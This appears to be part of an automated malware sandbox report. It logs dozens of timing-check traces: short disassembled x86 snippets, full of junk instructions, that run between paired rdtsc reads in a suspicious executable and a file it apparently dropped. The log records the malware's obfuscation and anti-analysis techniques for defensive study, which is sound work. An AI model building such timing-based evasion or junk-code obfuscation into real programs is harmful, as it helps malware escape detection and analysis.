Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F0A58 second address: 50F0A8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297131h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA441297138h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F0A8A second address: 50F0A90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10231C0 second address: 10231C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10231C6 second address: 10231CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10231CA second address: 10231CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10231CE second address: 10231D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10231D4 second address: 1023211 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA441297131h 0x00000008 push eax 0x00000009 je 00007FA441297126h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jbe 00007FA441297145h 0x00000018 jmp 00007FA441297135h 0x0000001d push ebx 0x0000001e push eax 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 101482A second address: 101484D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007FA4407343E9h 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10223D7 second address: 10223F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297135h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10229B0 second address: 10229BC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA4407343D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1022B14 second address: 1022B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA441297139h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1024445 second address: 1024449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1024449 second address: 10244E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sbb edx, 0958CF34h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FA441297128h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 362E59F4h 0x0000002e push edi 0x0000002f jmp 00007FA441297133h 0x00000034 pop edi 0x00000035 xor dword ptr [esp], 362E5974h 0x0000003c jmp 00007FA441297134h 0x00000041 mov esi, dword ptr [ebp+122D2D18h] 0x00000047 push 00000003h 0x00000049 jnc 00007FA44129712Ch 0x0000004f push 00000000h 0x00000051 sub dword ptr [ebp+122D265Bh], eax 0x00000057 push 00000003h 0x00000059 call 00007FA441297129h 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 jne 00007FA441297126h 0x00000067 pop eax 0x00000068 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10244E0 second address: 1024518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007FA4407343E4h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1024518 second address: 1024522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA441297126h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1024522 second address: 1024552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b ja 00007FA4407343E3h 0x00000011 pushad 0x00000012 jmp 00007FA4407343DFh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1024552 second address: 10245CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007FA441297136h 0x0000000f pop eax 0x00000010 mov edi, 2DFD870Ch 0x00000015 lea ebx, dword ptr [ebp+12449347h] 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FA441297128h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 xchg eax, ebx 0x00000036 jns 00007FA441297141h 0x0000003c push eax 0x0000003d jbe 00007FA441297134h 0x00000043 push eax 0x00000044 push edx 0x00000045 je 00007FA441297126h 0x0000004b rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1024719 second address: 102471F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1024793 second address: 1024797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1024797 second address: 102479B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 102479B second address: 10247D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push ebx 0x0000000b jne 00007FA44129712Ch 0x00000011 pop edi 0x00000012 push 00000000h 0x00000014 add dword ptr [ebp+122D2F08h], edi 0x0000001a push 3355BEF6h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA44129712Fh 0x00000027 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104677F second address: 1046797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4407343E4h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1046797 second address: 10467A5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA441297126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10467A5 second address: 10467A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104495C second address: 104496C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA441297126h 0x0000000a je 00007FA441297126h 0x00000010 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1044E68 second address: 1044E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1044FFF second address: 1045008 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1045008 second address: 1045024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA4407343D6h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jnp 00007FA4407343D6h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1045024 second address: 104502D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104502D second address: 1045035 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1045035 second address: 104503A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104503A second address: 1045058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4407343E6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10451E7 second address: 10451F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA44129712Ah 0x0000000b rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10451F7 second address: 1045209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FA4407343D6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1045462 second address: 1045468 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1045DFD second address: 1045E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 jl 00007FA4407343F9h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1045E0C second address: 1045E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10460BD second address: 10460CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FA4407343D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10460CC second address: 10460D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10460D0 second address: 10460E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10460E9 second address: 1046100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA441297133h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1046100 second address: 1046104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1046104 second address: 104610A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104610A second address: 1046118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FA4407343D8h 0x0000000c rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1046118 second address: 1046131 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007FA441297126h 0x00000009 jmp 00007FA44129712Ah 0x0000000e pop ebx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1046578 second address: 104657C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104657C second address: 1046592 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297130h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1046592 second address: 10465CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E3h 0x00000007 jp 00007FA4407343EFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10465CE second address: 10465EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FA441297126h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FA44129712Ch 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 101B280 second address: 101B284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 101B284 second address: 101B29C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FA44129712Dh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104E73B second address: 104E740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104E740 second address: 104E746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104E746 second address: 104E74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104D513 second address: 104D51D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104D51D second address: 104D521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104D521 second address: 104D543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA441297138h 0x0000000f rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104D543 second address: 104D548 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104DC48 second address: 104DC4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104DC4E second address: 104DC78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA4407343E0h 0x00000013 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104DC78 second address: 104DC7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 104DC7C second address: 104DC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 105380D second address: 1053811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1053811 second address: 1053817 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1053817 second address: 105382C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA44129712Fh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1052C26 second address: 1052C33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FA4407343D6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1052C33 second address: 1052C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA441297134h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1053010 second address: 105301A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA4407343D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1053353 second address: 1053359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1053359 second address: 105335F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 105335F second address: 1053388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FA441297138h 0x0000000e jbe 00007FA441297126h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1053388 second address: 1053391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1054AB2 second address: 1054B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 xor dword ptr [esp], 4BD7988Ch 0x0000000c mov di, si 0x0000000f call 00007FA441297129h 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007FA441297131h 0x0000001b jmp 00007FA441297137h 0x00000020 popad 0x00000021 jne 00007FA44129712Ch 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1054B08 second address: 1054B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1054B0D second address: 1054B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1054B13 second address: 1054B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1054B17 second address: 1054B83 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA441297126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FA44129712Ch 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 jmp 00007FA441297139h 0x0000001d jmp 00007FA441297130h 0x00000022 popad 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 jc 00007FA441297144h 0x0000002d pushad 0x0000002e jmp 00007FA441297136h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1054F03 second address: 1054F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 105518F second address: 1055194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1055194 second address: 10551A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 10551A3 second address: 10551A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 105B1E7 second address: 105B1ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 105CFFB second address: 105CFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 105CFFF second address: 105D003 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 105D003 second address: 105D00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 105D00B second address: 105D011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1060AD9 second address: 1060ADE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1060ADE second address: 1060B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FA4407343D8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 movsx ebx, bx 0x00000027 mov dword ptr [ebp+122D26F3h], edx 0x0000002d push 00000000h 0x0000002f ja 00007FA4407343D9h 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FA4407343E9h 0x0000003f rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1060B3B second address: 1060B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe RDTSC instruction interceptor: First address: 1060B3F second address: 1060B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
